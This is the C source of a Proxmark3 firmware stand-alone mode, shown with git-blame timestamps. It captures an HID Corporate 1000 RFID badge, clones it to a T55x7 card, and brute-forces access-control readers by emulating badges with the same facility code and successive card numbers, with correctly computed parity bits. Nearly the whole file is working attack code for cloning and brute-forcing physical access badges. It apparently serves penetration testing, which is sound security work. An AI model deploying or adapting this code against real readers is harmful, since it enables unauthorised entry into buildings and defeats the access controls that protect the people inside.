2017-10-29 10:26:46 +08:00
|
|
|
//-----------------------------------------------------------------------------
|
|
|
|
// Samy Kamkar, 2012
|
|
|
|
// Federico Dotta, 2015
|
|
|
|
// Maurizio Agazzini, 2015
|
|
|
|
// Christian Herrmann, 2017
|
|
|
|
//
|
|
|
|
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
|
|
|
|
// at your option, any later version. See the LICENSE.txt file for the text of
|
|
|
|
// the license.
|
|
|
|
//
|
|
|
|
// PROXMARK3 - HID CORPORATE 1000 BRUTEFORCER (STAND-ALONE MODE)
|
|
|
|
//
|
|
|
|
// This version of Proxmark3 firmware adds one extra stand-alone mode to proxmark3 firmware.
|
|
|
|
// The new stand-alone mode allows to execute a bruteforce on HID Corporate 1000 readers, by
|
|
|
|
// reading a specific badge and bruteforcing the Card Number (incrementing and decrementing it),
|
|
|
|
// mainteining the same Facility Code of the original badge.
|
|
|
|
//
|
|
|
|
// Based on an idea of Brad Antoniewicz of McAfee® Foundstone® Professional Services (ProxBrute),
|
|
|
|
// the stand-alone mode has been rewritten in order to overcome some limitations of ProxBrute firmware,
|
|
|
|
// that does not consider parity bits.
|
|
|
|
//
|
|
|
|
// https://github.com/federicodotta/proxmark3
|
|
|
|
//
|
|
|
|
//-----------------------------------------------------------------------------------
|
|
|
|
// main code for LF aka HID corporate brutefore by Federico Dotta & Maurizio Agazzini
|
|
|
|
//-----------------------------------------------------------------------------------
|
|
|
|
#include "lf_hidbrute.h"
|
|
|
|
|
|
|
|
// samy's sniff and repeat routine for LF
|
|
|
|
void RunMod() {
|
|
|
|
StandAloneMode();
|
|
|
|
FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
|
|
|
|
|
|
|
|
uint32_t high[OPTS], low[OPTS];
|
|
|
|
int selected = 0;
|
|
|
|
int playing = 0;
|
|
|
|
int cardRead = 0;
|
|
|
|
|
|
|
|
// Turn on selected LED
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
|
|
|
|
for (;;) {
|
|
|
|
WDT_HIT();
|
|
|
|
|
|
|
|
// exit from SamyRun, send a usbcommand.
|
|
|
|
if (usb_poll_validate_length()) break;
|
|
|
|
|
|
|
|
// Was our button held down or pressed?
|
|
|
|
int button_pressed = BUTTON_HELD(1000);
|
|
|
|
//SpinDelay(300);
|
|
|
|
|
|
|
|
// Button was held for a second, begin recording
|
|
|
|
if (button_pressed > 0 && cardRead == 0) {
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
LED(LED_RED2, 0);
|
|
|
|
|
|
|
|
// record
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] starting recording");
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
// wait for button to be released
|
|
|
|
while(BUTTON_PRESS())
|
|
|
|
WDT_HIT();
|
|
|
|
|
|
|
|
/* need this delay to prevent catching some weird data */
|
|
|
|
SpinDelay(500);
|
|
|
|
|
|
|
|
CmdHIDdemodFSK(1, &high[selected], &low[selected], 0);
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] recorded %x %x %08x", selected, high[selected], low[selected]);
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
// Finished recording
|
|
|
|
// If we were previously playing, set playing off
|
|
|
|
// so next button push begins playing what we recorded
|
|
|
|
playing = 0;
|
|
|
|
cardRead = 1;
|
|
|
|
}
|
|
|
|
else if (button_pressed > 0 && cardRead == 1) {
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
LED(LED_ORANGE, 0);
|
|
|
|
|
|
|
|
// record
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] cloning %x %x %08x", selected, high[selected], low[selected]);
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
// wait for button to be released
|
|
|
|
while(BUTTON_PRESS())
|
|
|
|
WDT_HIT();
|
|
|
|
|
|
|
|
/* need this delay to prevent catching some weird data */
|
|
|
|
SpinDelay(500);
|
|
|
|
|
|
|
|
CopyHIDtoT55x7(0, high[selected], low[selected], 0);
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] cloned %x %x %08x", selected, high[selected], low[selected]);
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
// Finished recording
|
|
|
|
|
|
|
|
// If we were previously playing, set playing off
|
|
|
|
// so next button push begins playing what we recorded
|
|
|
|
playing = 0;
|
|
|
|
cardRead = 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
// Change where to record (or begin playing)
|
|
|
|
else if (button_pressed) {
|
|
|
|
// Next option if we were previously playing
|
|
|
|
if (playing)
|
|
|
|
selected = (selected + 1) % OPTS;
|
|
|
|
playing = !playing;
|
|
|
|
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
|
|
|
|
// Begin transmitting
|
|
|
|
if (playing && selected != 2) {
|
|
|
|
|
|
|
|
LED(LED_GREEN, 0);
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] playing");
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
// wait for button to be released
|
|
|
|
while (BUTTON_PRESS())
|
|
|
|
WDT_HIT();
|
|
|
|
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] %x %x %08x", selected, high[selected], low[selected]);
|
2017-10-29 10:26:46 +08:00
|
|
|
CmdHIDsimTAG(high[selected], low[selected], 0);
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] done playing");
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
if (BUTTON_HELD(1000) > 0) {
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] exiting");
|
2017-10-29 10:26:46 +08:00
|
|
|
LEDsoff();
|
|
|
|
return;
|
|
|
|
}
|
|
|
|
|
|
|
|
/* We pressed a button so ignore it here with a delay */
|
|
|
|
SpinDelay(300);
|
|
|
|
|
|
|
|
// when done, we're done playing, move to next option
|
|
|
|
selected = (selected + 1) % OPTS;
|
|
|
|
playing = !playing;
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
}
|
|
|
|
else if (playing && selected == 2)
|
|
|
|
{
|
|
|
|
// Now it work only with HID Corporate 1000 (35bit), but is easily extensible to others RFID.
|
|
|
|
// It is necessary only to calculate the correct parity.
|
|
|
|
|
|
|
|
// Brute force code
|
|
|
|
// Check if the badge is an HID Corporate 1000
|
|
|
|
if( (high[selected] & 0xFFFFFFF8) != 0x28 ) {
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[-] Card is not a HID Corporate 1000. Skipping bruteforce.");
|
2017-10-29 10:26:46 +08:00
|
|
|
continue;
|
|
|
|
}
|
|
|
|
|
|
|
|
LED(LED_GREEN, 0);
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[=] entering bruteforce mode");
|
2017-10-29 10:26:46 +08:00
|
|
|
// wait for button to be released
|
|
|
|
while (BUTTON_PRESS())
|
|
|
|
WDT_HIT();
|
|
|
|
|
|
|
|
// Calculate Facility Code and Card Number from high and low
|
|
|
|
uint32_t cardnum = (low[selected] >> 1) & 0xFFFFF;
|
|
|
|
uint32_t fc = ((high[selected] & 1 ) << 11 ) | (low[selected] >> 21);
|
|
|
|
uint32_t original_cardnum = cardnum;
|
|
|
|
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] Proxbrute - starting decrementing card number");
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
while (cardnum >= 0) {
|
|
|
|
|
|
|
|
// Needed for exiting from proxbrute when button is pressed
|
|
|
|
if (BUTTON_PRESS()) {
|
|
|
|
if (BUTTON_HELD(1000) > 0) {
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] exiting");
|
2017-10-29 10:26:46 +08:00
|
|
|
LEDsoff();
|
|
|
|
return;
|
|
|
|
} else {
|
|
|
|
while (BUTTON_PRESS()) { WDT_HIT(); }
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
// Decrement Card Number
|
|
|
|
cardnum--;
|
|
|
|
|
|
|
|
// Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables
|
|
|
|
hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc);
|
|
|
|
|
|
|
|
// Print actual code to brute
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum);
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000);
|
|
|
|
}
|
|
|
|
|
|
|
|
cardnum = original_cardnum;
|
|
|
|
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] Proxbrute - starting incrementing card number");
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
while (cardnum <= 0xFFFFF) {
|
|
|
|
|
|
|
|
// Needed for exiting from proxbrute when button is pressed
|
|
|
|
if (BUTTON_PRESS()) {
|
|
|
|
if (BUTTON_HELD(1000) > 0) {
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] exiting");
|
2017-10-29 10:26:46 +08:00
|
|
|
LEDsoff();
|
|
|
|
return;
|
|
|
|
} else {
|
|
|
|
while (BUTTON_PRESS()) { WDT_HIT(); }
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
// Decrement Card Number
|
|
|
|
cardnum++;
|
|
|
|
|
|
|
|
// Calculate checksum of HID Corporate 1000 and set card number and facility code in high and low variables
|
|
|
|
hid_corporate_1000_calculate_checksum_and_set(&high[selected], &low[selected], cardnum, fc);
|
|
|
|
|
|
|
|
// Print actual code to brute
|
2018-02-22 22:13:43 +08:00
|
|
|
Dbprintf("[+] TAG ID: %x%08x (%d) - FC: %u - Card: %u", high[selected], low[selected], (low[selected] >> 1) & 0xFFFF, fc, cardnum);
|
2017-10-29 10:26:46 +08:00
|
|
|
|
|
|
|
CmdHIDsimTAGEx(high[selected], low[selected], 1, 50000);
|
|
|
|
}
|
|
|
|
|
2018-02-22 22:13:43 +08:00
|
|
|
DbpString("[+] done bruteforcing");
|
2017-10-29 10:26:46 +08:00
|
|
|
if (BUTTON_HELD(1000) > 0) {
|
|
|
|
DbpString("Exiting");
|
|
|
|
LEDsoff();
|
|
|
|
return;
|
|
|
|
}
|
|
|
|
|
|
|
|
/* We pressed a button so ignore it here with a delay */
|
|
|
|
SpinDelay(300);
|
|
|
|
|
|
|
|
// when done, we're done playing, move to next option
|
|
|
|
selected = (selected + 1) % OPTS;
|
|
|
|
playing = !playing;
|
|
|
|
LEDsoff();
|
|
|
|
LED(selected + 1, 0);
|
|
|
|
|
|
|
|
} else {
|
|
|
|
while(BUTTON_PRESS())
|
|
|
|
WDT_HIT();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
// Function that calculate next value for the brutforce of HID corporate 1000
|
|
|
|
void hid_corporate_1000_calculate_checksum_and_set( uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc) {
|
|
|
|
|
|
|
|
uint32_t new_high = 0;
|
|
|
|
uint32_t new_low = 0;
|
|
|
|
|
|
|
|
// Calculate new high and low base value from card number and facility code, without parity
|
|
|
|
new_low = (fc << 21) | (cardnum << 1);
|
|
|
|
new_high = 0x28 | ((fc >> 11) & 1); // 0x28 is 101000
|
|
|
|
|
|
|
|
int n_ones;
|
|
|
|
uint32_t i;
|
|
|
|
|
|
|
|
// Calculating and setting parity bit 34
|
|
|
|
// Select only bit used for parity bit 34 in low number (10110110110110110110110110110110)
|
|
|
|
uint32_t parity_bit_34_low = new_low & 0xB6DB6DB6;
|
|
|
|
n_ones = 0;
|
|
|
|
// Calculate number of ones in low number
|
|
|
|
for ( i = 1; i != 0; i <<= 1) {
|
|
|
|
if( parity_bit_34_low & i )
|
|
|
|
n_ones++;
|
|
|
|
}
|
|
|
|
// Calculate number of ones in high number
|
|
|
|
if (new_high & 1)
|
|
|
|
n_ones++;
|
|
|
|
|
|
|
|
// Set parity bit (Even parity)
|
|
|
|
if (n_ones % 2)
|
|
|
|
new_high = new_high | 0x2;
|
|
|
|
|
|
|
|
// Calculating and setting parity bit 1
|
|
|
|
// Select only bit used for parity bit 1 in low number (01101101101101101101101101101100)
|
|
|
|
uint32_t parity_bit_1_low = new_low & 0x6DB6DB6C;
|
|
|
|
n_ones = 0;
|
|
|
|
|
|
|
|
// Calculate number of ones in low number
|
|
|
|
for ( i=1; i != 0; i <<= 1) {
|
|
|
|
if( parity_bit_1_low & i )
|
|
|
|
n_ones++;
|
|
|
|
}
|
|
|
|
// Calculate number of ones in high number
|
|
|
|
if ( new_high & 0x1)
|
|
|
|
n_ones++;
|
|
|
|
|
|
|
|
if ( new_high & 0x2)
|
|
|
|
n_ones++;
|
|
|
|
|
|
|
|
// Set parity bit (Odd parity)
|
|
|
|
if (!(n_ones % 2))
|
|
|
|
new_low = new_low | 0x1;
|
|
|
|
|
|
|
|
// Calculating and setting parity bit 35
|
|
|
|
n_ones = 0;
|
|
|
|
// Calculate number of ones in low number (all bit of low, bitmask unnecessary)
|
|
|
|
for (i = 1; i != 0; i <<= 1) {
|
|
|
|
if ( new_low & i )
|
|
|
|
n_ones++;
|
|
|
|
}
|
|
|
|
// Calculate number of ones in high number
|
|
|
|
if ( new_high & 0x1)
|
|
|
|
n_ones++;
|
|
|
|
|
|
|
|
if ( new_high & 0x2)
|
|
|
|
n_ones++;
|
|
|
|
|
|
|
|
// Set parity bit (Odd parity)
|
|
|
|
if (!(n_ones % 2))
|
|
|
|
new_high = new_high | 0x4;
|
|
|
|
|
|
|
|
// Setting new calculated values
|
|
|
|
*low = new_low;
|
|
|
|
*high = new_high;
|
|
|
|
}
|
|
|
|
|
|
|
|
// prepare a waveform pattern in the buffer based on the ID given then
|
|
|
|
// simulate a HID tag until the button is pressed or after #numcycles cycles
|
|
|
|
// Used to bruteforce HID in standalone mode.
|
|
|
|
|